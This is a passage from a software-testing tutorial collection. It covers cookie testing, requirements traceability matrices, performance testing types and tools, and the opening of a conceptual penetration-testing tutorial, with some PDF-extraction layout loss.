your browser to reject cookies, you can request this site to send a
cookie to the browser and check if the cookie gets rejected. If you’ve
configured your browser to accept cookies, you can use this page to
make sure that the cookies are being sent and aren’t getting blocked.
26
• Set the Cookie name and Value

• Click on ‘Set TestCookie’
If you have disabled the cookies then the cookie should be rejected.
Cookie Checker
This site checks the cookies from a site and gives a full report on the
purpose of each cookie.
Conclusion
The purpose of a cookie is to identify users to save login information of
a website or prepare customized web pages. Cookie saves the time of
Users when they revisit the site. Cookie testing is quite common and
important in terms of security and quick access to any web application.
As a web application tester, you have to include cookie testing as a
part of your test plan.
Like this post? Share it with your friends! If you have any queries,
please comment below.
Here are a few hand-picked Tutorials for you to read next:
Requirements Traceability Matrix

(RTM) | SoftwareTestingMaterial
What is Requirement Traceability Matrix?
Requirements Traceability Matrix (RTM) is used to trace the requirements
to the tests that are needed to verify whether the requirements are fulfilled.
Requirement Traceability Matrix AKA Traceability Matrix or Cross
Reference Matrix.
Advantage of Requirements Traceability Matrix (RTM):
1. 100% test coverage
2. It allows to identify the missing functionality easily
3. It allows to identify the test cases which needs to be updated in
case of change in requirement
4. It is easy to track the overall test execution status
How to prepare Requirement Traceability Matrix (RTM):
• Collect all the available requirement documents.
• Allot an unique Requirement ID for each and every Requirement
• Create Test Cases for each and every requirement and link Test
Case IDs to the respective Requriement ID.
Like all other test artifacts, RTM too varies between organizations.
Most of the organizations use just the Requirement Id’s and Test Case
Id’s in the RTM. It is possible to make some other fields such as
Requirement Description, Test Phase, Test case result, Document
27
Owner etc., It is necessary to update the RTM whenever there is a

change in requirement.
The following illustration gives you a basic idea about Requirement
Traceability Matrix (RTM).
Assume we have 5 requirements
Assume total test cases identified are 10

Whenever we write new test cases, the same need to be updated in
the RTM
Adding a new test case id TID011 and mapping it to the requirement
id BID005
Please be patient. The video will load in some time.
Types of Requirements Traceability Matrix (RTM):

Let’s see different types of Traceability Matrix:
• Forward Traceability: Mapping requirements to test cases is
called Forward Traceability Matrix. It is used to ensure whether
the project progresses in the desired direction. It makes sure
that each requirement is tested thoroughly.
• Backward or Reverse Traceability: Mapping test cases to
requirements is called Backward Traceability Matrix. It is used to
ensure whether the current product remains on the right track. It
makes sure that we are not expanding the scope of the project
by adding functionality that is not specified in the requirements.
• Bi-directional traceability (Forward + Backward): Mapping
requirements to test cases (forward traceability) and test
cases to requirements (backward traceability) is called Bi-
directional Traceability Matrix. It is used to ensure that all the
specified requirements have appropriate test cases and vice
versa.
Download Sample RTM Template:
Performance Testing Tutorial |
Software Testing Material
In the field of Software Testing, Testers mainly concentrate on Black
Box and White Box Testing. Under the Black Box testing, again there are
different types of testing. The major types of testing are Functionality testing
and Non-functional testing. Performance testing and types of performance
testing fall under Non-functional testing.
What is Performance Testing?
28

Web application performance testing is conducted to mitigate the risk

of availability, reliability, scalability, responsiveness, stability etc. of a
system.

Why Performance Testing?

In the current market performance and responsiveness of applications
play an important role in the success of a business. We conduct
performance testing to address the bottlenecks of the system and to
fine-tune the system by finding the root cause of performance issues.
Performance testing answers to the questions like how many users
the system could handle, how well the system could recover when the
no. of users crossed the maximum users, what is the response time
of the system under normal and peak loads.
We use performance testing tools to measure the performance of a

system or application under test (AUT) and help in releasing high-
quality software but it is not done to find defects in an application.
Load and performance testing will determine whether an application

meets Speed, Scalability, and Stability requirements under expected
workloads.
Speed: It determines whether an application responds quickly

Scalability: It determines maximum load an application can handle
Stability: It determines whether an application is stable under varying
loads
Poorly performed applications gain a bad reputation and fail to meet
the expected goals. So performance testing of an application is very
important.
Types of Performance Testing?

Capacity Testing:
Capacity Testing is to determine how many users a system/application

can handle successfully before the performance goals
29
become unacceptable. This allows us to avoid the potential problems

in the future such as increased user base or increased volume of data.
It helps users to identify a scaling strategy in order to determine
whether a system should scale up or scale out. It is done majorly for
eCommerce and Banking sites. are some examples. This testing is
sometimes called Scalability testing.
Load Testing:

Volume Testing:
Volume Testing is to verify whether a system/application can handle a

large amount of data. This testing focuses on Data Base. Performance
tester who does volume testing has to populate a huge volume of data
in a database and monitors the behavior of a system.
Stress Testing:
Soak/Endurance Testing:
Soak Testing is aka Endurance Testing. Running a system at high

load for a prolonged period of time to identify the performance
problems is called Soak Testing. It is to make sure the software can
handle the expected load over a long period of time.
Spike Testing:
Spike Testing is to determine the behavior of the system under a

sudden increase of load (a large number of users) on the system.
Read more: Types of Performance Testing & 100+ Types of Software

Testing
Difference between Functional Testing and Non-
functional Testing?
30
Functional Testing Non-functional Testing
What the system actually does is functional How well the system performs is non-
testing functionality testing
To ensure that your product meets customer To ensure that the product stands up to
and business requirements and doesn’t have customer expectations
any major bugs
To verify the accuracy of the software against To verify the behavior of the software at
expected output various load conditions
It is performed before non-functional testing It is performed after functional testing
Example of functional test case is to verify the Example of non-functional test case is to
login functionality check whether the homepage is loading
in less than 2 seconds
Testing types are Testing types are

• Unit testing • Performance Testing
• Smoke testing • Volume Testing
• User Acceptance • Scalability
• Integration Testing • Usability Testing
• Regression testing • Load Testing
• Localization • Stress Testing
• Globalization • Compliance Testing
• Interoperability • Portability Testing
• Disaster Recover Testing
It can be performed either manual or It can be performed efficiently if

automated way automated
Difference between Performance Testing, Load Testing

& Stress Testing
Performance Testing:
31
Performance testing is conducted to mitigate the risk of availability,

reliability, scalability, responsiveness, stability etc. of a system.

Load Testing:
Stress Testing:
Performance Testing Load testing Stress testing
It is a superset of load and It is a subset of It is a subset of

stress testing performance testing performance testing
Goal of performance Goal of load testing is to Goal of stress testing is to

testing is to set the identify the upper limit of find how the system
benchmark and standards the system, set SLA of behaves under extreme
for the application the app and check how loads and how it recovers
the system handles from failure
heavy load
Load limit is both below Load limit is a threshold Load limit is above the
and above the threshold of of a break threshold of a break
a break
The attributes which are The attributes which are The attributes which are
checked in performance checked in a load checked in a stress
testing are speed, testing are peak testing are stability
response time, resource performance, server response time, bandwidth
usage, stability, reliability throughput, response capacity etc.,
and throughput time under various load
32
Performance Testing Load testing Stress testing
levels, load balancing

requirements etc.
Difference between Performance Engineering &

Performance Testing?
Performance engineering is a discipline that includes best practices
and activities during every phase of the software development life
cycle (SDLC) in order to test and tune the application with the intent of
realizing the required performance.
Performance testing simulates the realistic end-user load to determine
the speed, responsiveness, and stability of the system. It concerned
with testing and reporting the current performance of an application
under various parameters such as response time, concurrent user
load, server throughput etc.
Performance Testing Process
Identify the test environment:
Identify the physical test environment, production environment and
know what testing tools are available. Before beginning the testing
process, understand details of the hardware, software and network
configurations. This process must be revisited periodically throughout
the projects life cycle.
Identify performance acceptance criteria:

This includes goals and constraints for response time, throughput and
resource utilization. Response time is a user concern, throughput is a
business concern, and resource utilization is a system concern. It is
also necessary to identify project success criteria that may not be
captured by those goals and constraints.
Plan & Design performance tests:

Identify key scenarios to test for all possible use cases. Determine
how to simulate that variability, define test data, and establish metrics
to be gathered.
Configure the Test Environment:

Prepare the test environment, arrange tools and other resources
before execution
Implement the Test Design:

Develop the performance tests in accordance with the test design
Execute the Test:

33
Execute and monitor the tests
Analyze Results, Report, and Retest:

Consolidate, analyze and share test results. Fine tune and retest to
see if there is an improvement in performance. When all of the metric
values are within acceptable limits then you have finished testing that
particular scenario on that particular configuration.
Example of Performance Test Cases

Writing test cases for performance testing requires a different mindset
compared to writing functional test cases.
Read more: How To Write Functional Test Cases.
• To verify whether an application is capable of handling a certain

number of simultaneous users
• To verify whether the response time of an application under load
is within an acceptable range when the network connectivity is
slow
• To verify the response time of an application under low, normal,
moderate and heavy load conditions
• To check whether the server remain functional without any
crash under high load
• To verify whether an application reverts to normal behavior after
a peak load
• To verify database server and CPU and memory usage of the
application under peak load
How to choose the right Performance Testing Tool
There are many tools in the market to do performance testing. It is
impossible to mention the best performance testing tool out of all the
tools available. It is because every company has its own needs.
What’s perfect for one company may not be suitable for another
company. We have to do some analysis before choosing the right tool.
Here are some factors we have to consider when choosing the best
performance testing tool.
Some factors considered for choosing the best performance testing

tool for Performance Testing.
• Budget (License cost)
• Types of license
• Protocol support
• Customer preference of load testing tool
• The cost involved in training employees on the selected tool
• Hardware/Software requirements of a loading tool
• Tool Vendor support and update policy
34
What are some popular Performance Testing Tools to do

Performance Testing?
There are a lot of performance testing tools in the market. There are
free website load testing tools, paid tools and freemium tools. Almost
all the commercial performance testing tools have a free trial. You can
get a chance to work hands-on before deciding which is the best tool
for your needs.
Some of the popular performance testing tools are LoadRunner,

Apache JMeter, NeoLoad, StresStimulus, LoadUI Pro, WebLOAD,
Rational Performance Tester, AppLoader, SmartMeter.io, Silk
Performer, StormRunner Load, LoadView.
View our full list of Popular Performance Testing Tools.

Conclusion:
In this article, we have covered most of the information required to
understand Performance testing. If you have any queries, please
comment in the comment section below.
Related posts:
• Popular Performance Testing Tools
• Penetration Testing Tutorial
• Security Testing Tutorial
• Popular Penetration Testing Tools
• Popular Security Testing Tools
Performance Testing Tools (Load

Testing Tools) in 2020
In this post, we learn the most popular Performance Testing Tools (aka
Load Testing Tools). We all know it’s hard to imagine today’s world without
the internet. Websites help us connect with people, provide stores for online
purchases, bring new stories anytime from anywhere in the world. We can
access these websites from any computer or mobile device. For an online
business to be successful, it has to be available without long wait times,
delays, errors, or service interruptions. Websites must be able to handle a
sudden increase in traffic without compromising the user experience. It is
important to measure application performance in peak traffic and under
extreme stress conditions.
In this article, we will be looking into the following
• What is Performance Testing

• How to choose the right Performance Testing Tool
• Popular Performance/Load Testing Tools
35
• 1. WebLOAD
• 2. LoadRunner
• 3. Apache JMeter
• 4. NeoLoad
• 5. StresStimulus
• 6. LoadUI Pro
• 7. Rational Performance Tester
• 8. AppLoader
• 9. SmartMeter.io
• 10. Silk Performer
• 11. StormRunner Load
• 12. LoadView
• Some other Performance/Load Testing Tools
What is Performance Testing
Performance testing determines or validates the speed, scalability,
and/or stability characteristics of the system or application under
test. Performance is concerned with achieving response times,
throughput, and resource-utilization levels that meet the performance
objectives for the project or product.
Performance testing and types of performance testing such as Load

Testing, Volume Testing, Stress Testing, Capacity Testing,
Soak/Endurance Testing, and Spike Testing come under Non-
functional Testing.
Read more on Performance Testing

In the current market, the performance of an application play a vital
role. We conduct performance testing to address the bottlenecks of
the system and to fine-tune the system by finding the root cause of
performance issues. Performance testing answers to the questions
like how many users the system could handle, how well the system
could recover when the no. of users crossed the maximum users,
what is the response time of the system under normal and peak loads.
We use performance testing tools to measure the performance of a

system or application under test (AUT) and help in releasing high-
quality software.
How to choose the right Performance Testing Tool

There are many tools in the market to do performance testing. It is
impossible to mention the best performance testing tool out of all the
tools available. It is because every company has its own needs.
What’s perfect for one company may not be suitable for another
company. We have to do some analysis before choosing the right tool.
36
Here are some factors we have to consider when choosing the best
performance testing tool.
Some factors considered for choosing the best performance testing

tool for Performance Testing.
• Budget (License cost)

• Types of license
• Protocol support
• Customer preference of load testing tool
• Cost involved in training employees on selected tool
• Hardware/Software requirements of a load tool
• Tool Vendor support and update policy
Popular Performance Testing Tools
(Load Testing Tools)
There are a lot of performance testing tools in the market. There are
free website load testing tools, paid tools and freemium tools. Here we
have included both open source performance testing tools and
commercial performance testing tools. Almost all the commercial
performance testing tools have a free trial. You can get a chance to
work hands-on before deciding which is the best tool for your needs.
It plays a vital role in ensuring that the performance of the released
software meets the agreed SLA (Service Level Agreement).
Performance testing tools let you perform extensive performance

testing and make sure your site won’t slow down or crash when
business is booming.
The performance issue is the one almost every industry (like Banking,
eCommerce, Airlines, Retail, Restaurants, etc.,) is facing in common.
We are trying to bring a comprehensive list of popular performance

testing tools for measuring web application performance and load
stress capacity before you.
1. WebLOAD
WebLOAD is an enterprise-grade load and performance testing tool

which is designed for web applications. It supports over a hundred
technologies from web protocols to enterprise applications and has
built-in integration with Jenkins, Selenium and many other tools to
enable continuous load testing for DevOps. It combines performance,
37
scalability, and integrity as a single process for the verification

of web and mobile applications. It can simulate hundreds of thousands
of concurrent users making it possible to test large loads and report
bottlenecks, constraints, and weak points within an application. The
results of the tests are collected from the Load Machines and it can be
viewed in real-time in a tabular or graphical format. It is compatible
with operating systems like Microsoft Windows, and Linux.
WebLOAD Features:
Following are some of the most important features of WebLOAD
• WebLOAD can be run as an on-premise product or as a fully

managed SaaS load testing solution.
• A set of predefined analysis reports provides performance data,
helping users identify bottlenecks. Reports and analysis data
can also be viewed remotely via a customizable Web
Dashboard.
• It supports a wide range of web, mobile, and enterprise
protocols and technologies.
• A powerful correlation engine recognizes both server-side and
client-side dynamic values.
Protocols:
Protocols and technologies supported by WebLOAD are as follows.
It supports a wide range of web, mobile, and enterprise protocols and

technologies such as HTTP/HTTPS, WebSocket, PUSH, AJAX,
SOAP, HTML5, WebDAV and many others.
Download Link: WebLOAD
2. LoadRunner (HP Performance Tester)
LoadRunner is a Load Testing Software from Micro Focus for
application load testing. As a performance testing tool, it is used to test
applications, measuring system behavior, and performance under
load. It can create and handle thousands of concurrent users to put
the application through the rigors of real-life user loads while gathering
required information with respect to the performance and also based
on the infrastructure components (Web servers, database servers
etc.). It reports the end user response times for business processes
and transactions to compare them against the service level
agreements (SLA). The results can then be analyzed in detail to
explore the reasons for a particular behavior. It is compatible with
operating systems like Microsoft Windows, and Linux.
LoadRunner Features:
Following are some of the most important features of LoadRunner
38
• It supports performance testing of the latest technologies as well

as the legacy applications.
• Supports both Browser-based and Native Mobile applications
tests using advanced Network behavior and Service
Virtualization
• Integrate load testing into your development tools: IDE, jUnit,
nUnit, Jenkins, Selenium and Microsoft Visual Studio
• It identifies performance bottlenecks by using integrated
performance monitors in real-time that leverage application-
layer and code-level data for root cause and analytics
Protocols:
Protocols and technologies supported by LoadRunner are as follows.
LoadRunner supports performance testing for a wide range of

application environments and protocols more than 50 which includes
Ajax, Flex, HTML 5, Microsoft Silverlight, HTTP/2, MQTT, Web,
SOAP, ERP, Web services, GWT, RDP, Database, Terminal, Citrix,
Java, .NET, Oracle, and SAP. It supports the latest application
technologies as well as the legacy ones.
Download link: LoadRunner
3. Apache JMeter
Apache JMeter application is a free and open source load testing tool.
It was written in Java. It was originally designed for testing web
applications but later its scope has expanded. It is designed to load
test for analyzing and measuring the performance of a variety of
services. It can be used to test performance on both static as well as
dynamic resources such as dynamic web applications. It is useful to
simulate a heavy load on a server, group of servers, network to review
the performance of an application under different load conditions. It
works on Linux, Windows & Mac OS X.
Apache JMeter Features:

Following are some of the most important features of JMeter
• It is a free open source software

• It comes with a simple and intuitive GUI.
• It is a platform independent tool. It is written and developed
using Java. It can run on any environment which accepts JVM
(Java Virtual Machine).
• It is highly extensible and supports different server types.
• Its full multi-threading framework allows concurrent sampling by
many threads and simultaneous sampling of different functions
by separate thread groups.
• A complete and ready to present dynamic HTML report
39
• Easy correlation through an ability to extract data from most

popular response formats, HTML, JSON, XML or any textual
format
• It supports multiple protocols
Protocols & Technologies:
Protocols supported by JMeter are as follows.
• Web – HTTP, HTTPS (Java, NodeJS, PHP, ASP.NET, etc.,)

• Web Services – SOAP/REST
• FTP Service
• Database via JDBC drivers
• LDAP directory
• Mail Services – SMTP, POP3, IMAP
• Messaging-oriented middleware (MOM) via JMS
• Native command or shell scripts
• TCP
• Java objects
Download Link: JMeter
4. NeoLoad
NeoLoad is a powerful load and performance testing software solution
designed for web and mobile applications. It simulates a large number
of users and analyses server behavior. It identifies performance
bottlenecks and provides a solution to optimize the design and
development of the application before they become expensive issues
in production. It allows users to conduct load tests quickly, efficiently,
and frequently. This means you can confidently deploy high-
performance internet, intranet or mobile applications regardless of
what technologies. It even supports the newest technologies such as
Flex, Silverlight, GWT, SPDY, JSON, and AJAX Push. It integrates
with Continuous Delivery platform. It is compatible with operating
systems like Microsoft Windows, Linux, and Solaris.
NeoLoad Features:
Following are some of the most important features of NeoLoad
• It supports latest technologies like HTML5, Push, WebSocket,

AngularJS, Oracle Forms and many more
• Scriptless design and visual programming
• Integration with Continuous Integration servers. It provides an
out-of-the-box CI plugin for Jenkins, TeamCity, Bamboo,
XebiaLabs XL Release.
• Native GIT support
• It integrates with functional testing tools like Selenium, Appium,
Perfecto MobileCloud etc.,
Protocols:
40
Protocols and technologies supported by NeoLoad are as follows.
SAP GUI Web, HTTP, HTTPS, WebSocket, SOAP, REST, Silverlight,

Java Serialization, Java Message Service, GWT, AJAX, Oracle
Forms, Push technologies, etc.,
Download Link: NeoLoad

5. StresStimulus
StresStimulus is a load testing tool for web applications, mobile, and
Enterprise apps. It determines the web performance and scalability of
an application under the rigors of heavy traffic load. It collects real-
time server monitoring information to pinpoint application performance
bottlenecks and isolate web speed issues. It supports native app
framework which saves time on mobile app load testing. It records
user actions and replays them in order to emulate variable usage
patterns. It also monitors a load impact on application responsiveness
and server infrastructure. It automatically fixes playback errors. It
comes with both free and commercial versions. You can get a 7-day
extendable trial with up to 10k virtual users and full support in the free
trial.
StresStimulus Features:
Following are some of the most important features of StresStimulus
• It can be used on-premises or from the cloud.

• It works with or without Fiddler. Fiddler helps to create, analyze
and debug HTTP traffic.
• Scripting is not required but is available. We can create the
entire test case through a GUI and wizard-based interface
without touching script.
• Multiple secure authentication methods are supported, including
Web Forms, Basic, NTLM, and Kerberos.
• It supports parameterization with external data (CSV files)
• It gives in-depth reporting. It generates a test summary report
that presents key performance metrics.
Protocols:
Protocols and technologies supported by StresStimulus are as follows.
HTTP, HTTPS, AJAX, SOAP, WCF, binary WCF, and XML over
HTTP.
Download Link: StressStimulus
6. LoadUI Pro
LoadUI Pro by Smartbear is a load testing tool for REST & SOAP
APIs, Databases, and Microservices. It runs on Windows, Linux and
Mac OS. It allows users to create script less and sophisticated load
41
tests in the shortest time. It allows users to test the speed and
scalability of APIs, preview API performance behaviors before
releasing to production environments and shift performance insights to
the left. Users can access detailed reports and automate load tests on
Bamboo, Jenkins, TFS, and other automation frameworks.
Additionally, SoapUI functional tests can be quickly converted into
load tests using LoadUI Pro without writing a single line of a script.
LoadUI Pro Features:

Following are some of the most important features of LoadUI Pro
• Cloud-based API load tests
• Scriptless load test creation
• Reuse existing functional tests without modifying the original
tests
• Parallel API load testing
• Server monitoring gives visibility into how servers respond to
traffic
Protocols:
Protocols and technologies supported by LoadUI Pro are as follows
HTTP, REST, SOAP, JSON, JMS, JSON Schema, XML Schema,

WSDL etc.,
Download Link: LoadUI Pro

7. Rational Performance Tester
IBM Rational Performance Tester (RPT) is a performance and load
testing tool that identifies the presence and cause of system
performance bottlenecks. It allows the development team to validate
the scalability and reliability of web-based applications before
deployment into a production environment.
It can be used for both web-based applications and server-based
applications. It identifies and rectifies leakages in the websites and the
servers. It is compatible with operating systems such as AIX, Mac OS
X, and Microsoft Windows.
Rational Performance Tester Features:

Following are some of the most important features of Rational
Performance Tester
• Offers real-time reporting for immediate awareness of

performance problems at any time during a test.
• Root cause analysis helps to identify both the source code and
physical application tier that are causing the bottleneck.
• Supports load testing against applications such as HTTP, SAP,
Siebel, SIP, TCP Socket, Citrix
42
• Offers emulation of user populations while minimizing the

memory and processor footprint
• Automates test data variation and enables insertion of custom
Java code
Protocols:
Protocols and technologies supported by Rational Performance Tester
are as follows.
HTTP, Citrix, SOA, SOP, Socket Recording etc.,
Download Link: http://www.ibm.com/developerworks/downloads/r/rpt/

8. AppLoader
AppLoader is a load testing tool to make sure the readiness of an
application. It allows you to test any application by reproducing the
same user experience from all your access points: Thin, fat clients,
and web portals. It tests any business application that is accessed
through thin, fat clients and web portals. Entire business flow can be
tested, including all third-party apps, without adding plugins or writing
a single line of code. It is compatible with all versions of Citrix, Cloud-
Based & Hybrid infrastructures, EHR systems, custom apps
AppLoader Features:
Following are some of the most important features of AppLoader
• It supports Citrix, PeopleSoft, Java, .NET, Adobe, client-server,

Oracle, Siebel, SAP, web, custom apps etc.,
• It is protocol independent
• Load Test any application, any environment
• Simulate user actions on any kind of application for any number
of users.
• Build any scenario without scripting, (including mouse events,
keyboard inputs, if conditions, etc), and replay these actions as
an automat.
Protocols:
Apploader is protocol independent
Download Link: https://www.nrgglobal.com/apploader-performance-
testing-download
9. SmartMeter.io
SmartMeter.io is a multi-platform load and performance testing tool. It
features fast and easy test creation and execution, test management
and generating of test reports with a focus on testing in a distributed
mode. It is based on Apache JMeter but adds new features such as
one-click test reports, advanced scenario recorder, acceptance
criteria, and others. It is compatible with operating systems such as
Linux, Mac OS, and Microsoft Windows.
43
SmartMeter.io Features:
Following are some of the most important features of SmartMeter.io
• Scriptless test recording

• It fits very well into a continuous integration process
• Automatically generated test reports with test details and results
• Real-time test results on multiple monitors
• Combine load tests with Selenium
Protocols:
Protocols and technologies supported by SmartMeter.io are as
follows.
HTTP, HTTPS, FTP, JDBC, LDAP, SOAP, and JMS
Download Link: https://www.smartmeter.io/download

10. Silk Performer
Silk Performer is a load and stress testing tool for optimizing business
application performance from Micro Focus. It has the ability to test
multiple application environments with thousands of concurrent users.
Silk Performer can considerably speed up testing cycles by allowing
you to reuse your existing functional tests (Silk Test or Selenium) for
performance testing and synthetic monitoring purposes as well. It also
supports the widest range of protocols.
Silk Performer Features:
Following are some of the most important features of Silk Performer
• Re-Use Functional Test Assets for Performance Testing and

Monitoring
• Cloud integration and unlimited scalability from the cloud
• Supports Server monitoring, reporting, and analysis
• It provides extensive support for mobile web and native
applications, with profiles for all popular mobile devices,
application types and connection speeds.
Protocols:
Protocols and technologies supported by Silk Performer are as
follows.
HTTP(S)/HTML, HTTP/2, IPv6, Ajax, Silverlight, mobile devices, Java

over HTTP, HTTP Live Streaming (HLS), Adobe Flex/AMF3, Granite
DS Flex, Unicode (UTF-8), SOAP (XML), FTP, LDAP, MAPI, IMAP,
SMTP/POP, SSL, CORBA (IIOP), Java RMI (EJB/J2EE), .NET
Remoting, Oracle Forms, Citrix, VMWare Horizon View, ODBC,
Oracle Call Interface (OCI), DB2 CLI, TCP/ IP, UDP, Tuxedo ATMI,
Jolt, TN3270E, TN5250, T100/200+, and UI-Level (Silk Test,
Selenium)
44
Download Link: https://www.microfocus.com/products/silk-

portfolio/silk-performer/
11. StormRunner Load
Micro Focus StormRunner Load from Micro Focus is a cloud-based
load and performance testing for web and mobile apps. It helps users
to detect performance issues and ensure that a mobile and web
application is ready for the load. It reduces the overall time for
performance testing engagement and is best suited or the applications
in the agile process. It compares the current test results with the
previous results to see if the current build is better than the previous or
not.
StormRunner Load Features:

Following are some of the most important features of StormRunner
Load
• Comparison of current test results with the previous results

• Supports Web, Web Services, SAP Web and JMeter scripts
• Integrating performance testing in CI/CD process
• It integrates with monitoring tools like SiteScope
• Configure the host file in the cloud images by uploading them as
part of the script
Download Link: https://www.microfocus.com/en-
us/products/stormrunner-load-agile-cloud-testing/free-trial
12. LoadView
LoadView is a cloud-based SaaS (Software as a Service) performance
testing tool that uses real browsers to run a performance test on
websites, and web applications. It allows users to record test scripts
via point and click. The test results are made available as real-time
online graphs. These reports include troubleshooting and analysis
tools that help users find and fix the bottlenecks. It can be used for
both load testing and stress testing. It supports a wide range of mobile
browsers and devices including iPhones, iPads, BlackBerry phones,
Android smartphones and tablets, Google devices, Nokia phones,
Amazon Kindles, and other mobile handsets and tablets.
LoadView Features:
Following are some of the most important features of LoadView
• Advanced load testing features include point and click scripting,
real browser testing, and global cloud-based infrastructure
• It is a fully managed cloud. No need to manage your own 3rd
party cloud accounts.
• Instantly spin up test machines with the most reliable cloud
platforms including Google, Amazon, and Rackspace.
45
• More accurate than headless browser PhantomJS and

Selenium IDE
• Browsers such as Chrome, IE, Android, and iOS browsers show
the actual performance of your website under load in real
browsers.
• Advanced scripting in over 40 desktop and mobile browsers.
• There is virtually no limit to the number of users that can be
generated for a load test
Download Link: http://www.loadview-testing.com/
Some other Performance Testing Tools are as follows:
There are a lot of Performance & Load testing tools and software’s in
the market. So we are trying to include some other load testing tools in
this list.
13. TestPlant: https://eggplant.io/

14. Soasta’s CloudTest: https://www.akamai.com/
15. Taurus: https://gettaurus.org/
16. Siege: https://www.joedog.org/siege-home/
17. Gatling: https://gatling.io/
18. LoadComplete: https://smartbear.com/product/loadcomplete/free-
tool
19. The Grinder: http://grinder.sourceforge.net/
20. BlazeMeter: https://www.blazemeter.com/
21. Loadster: http://www.loadsterperformance.com/loadster/free
22. Tricentis Flood: https://flood.io/load-performance-testing-tool/free-
load-testing-trial/
23. WAPT: http://www.loadtestingtool.com/wapt.exe
24. LoadImpact: http://loadimpact.com/
25. Appvance: http://www.appvance.com/trial/
26. Apica LoadTest: https://www.apicasystems.com/load-testing
27. QEngine
(ManageEngine): http://www.manageengine.com/products/qengine/
28. Loadstorm: http://loadstorm.com/
29. Httperf: http://www.hpl.hp.com/research/linux/httperf/download.php
30. OpenSTA: http://opensta.org/download.html
Conclusion:
We have learned that the performance testing tools or load testing
tools help us to eliminate performance bottlenecks and plan for the
resources that would be required to ensure high performed
applications. Here we listed popular performance testing tools (both
open source and commercial). Let us know your favorite performance
testing tool in the comments below. If you fell I forgot to mention any of
your favorite tools, let us know in the comments below. We will try to
include it in this list and update this post.
46
Penetration Testing Tutorial |

In this penetration testing tutorial (pen test tutorial), we are going to learn the
following:
• 1. What is a Penetration Testing

• 2. Why is Penetration Testing necessary
• 3. How often to conduct pen testing
• 4. What are the phases of Penetration Testing
• 5. What are the root causes of Security Vulnerabilities
• 6. What is the difference between Penetration Testing & Vulnerability
Scanning
• 7. Who Performs Pen-testing
• 8. Role and Responsibilities of Penetration Testers
• 9. Types of Penetration Testers
• 10. What is the difference between Black, White and Grey hat hackers
• 11. What are the types of Penetration Tests
• 12. What are the Types of Pen Testing
• 13. Limitations of Penetration Testing
• 14. Penetration Testing Tools
• 15. How to choose a Penetration Testing Tools
Let’s dive in further to learn Penetration testing without further delay.
What is a Penetration Testing?

Penetration testing is also a type of Security testing which is
performed to evaluate the security of the system (hardware, software,
networks or an information system environment). The goal of this
testing is to find all the security vulnerabilities that are present in an
application by evaluating the security of the system with malicious
techniques and to protect the data from the hackers and maintain
functionality of the system. It is a type of Non-functional testing which
intends to make authorized attempts to violate the security of the
system. It is also known as Pen Testing or Pen Test and the tester
who does this testing is a penetration tester aka ethical hacker.
Why is Penetration Testing necessary?

If a system is not secured, then an attacker can take authorized
access to the system. Penetration testing evaluates the security of a
system and protects it against internal and external threats. It identifies
the vulnerabilities and determines whether unauthorized access or
other malicious activity is possible.
Organizations conduct penetration testing for a number of reasons
1. To prevent data breaches

47
2. To check security controls

3. To meet compliance requirements
4. To ensure the security of new applications
5. To access incident detection and response effectiveness
How often to conduct pen testing?
Cyber-attacks are quite often in current days. It is very important to
conduct regular vulnerability scans and penetration testing to detect
recently discovered and previously unknown vulnerabilities.
The frequency of conducting pen testing should depend on your

organization’s security policy. However, conducting pen testing
regularly can determine the weaknesses of your system and keep it
stay away from security breaches.
Usually, pen testing is done after the deployment of new infrastructure

and applications. Also, it is done after major changes to infrastructure
and applications.
Vulnerability scanning examines the servers for vulnerabilities. We

have to make sure the vulnerabilities we found are not false positives.
Actually reporting false positives is a downside of vulnerability
scanning.
Penetration testing examines the servers for vulnerabilities and
exploits them.
Both vulnerability scanning and penetration testing can test an

organizations ability to detect security breaches. Organizations need
to scan both the external and internal infrastructure and applications to
protect against external and internal threats.
Organizations have to conduct regular penetration testing for the

following reasons:
• To find security vulnerabilities in a system

• To secure user data
• To test applications that are often the avenues of attack
• To identify new bugs in an existing system after deployment or
after major changes done in the system
• To prevent the black hat attacks and guards the user data
• To control revenue loss
• To improve the existing security standards
What are the phases of Penetration Testing?
The process of penetration testing can be divided into five phases,
which are as follows:
48
1. Planning phase
In this phase, we define the scope (which system to test and the goals
and objectives to achieve with the penetration test) and the resources
and the tools (vulnerability scanners or penetration testing tools) to
employ for test execution
2. Discovery phase
In this phase, we collect as much information as possible about the
systems that are in the scope of the penetration test.
3. Vulnerability assessment:
In vulnerability assessment, we just identify and report the vulnerability
using vulnerability scanning tools.
4. Exploitation Phase
In this phase, we try to exploit the vulnerabilities identified in the
previous phase (i.e., discovery phase) to gain access to the target
system.
5. Reporting Phase
In this phase, we document all the results and findings in an effective
manner. This report will be used as a reference document while
mitigating activities to address the identified vulnerabilities.
What are the root causes of Security Vulnerabilities?

Some of the root causes of Security Vulnerabilities are as follows
Complexity:
Security vulnerabilities rise in proportion to the complexity of a system.
Complexity in terms of software, hardware, information, businesses,
and processes introduce more security vulnerabilities.
Connectivity:
Every unsecured connection is a potential avenue for exploitation.
Design Flaws:
There shouldn’t be any design bugs in software and hardware. These
bugs can expose businesses to significant risks.
Configuration:
Poor system configuration introduces security vulnerabilities.
User Input:
Data received through SQL injections, buffer overflows etc., can be
designed to attack the receiving system.
Management:
49
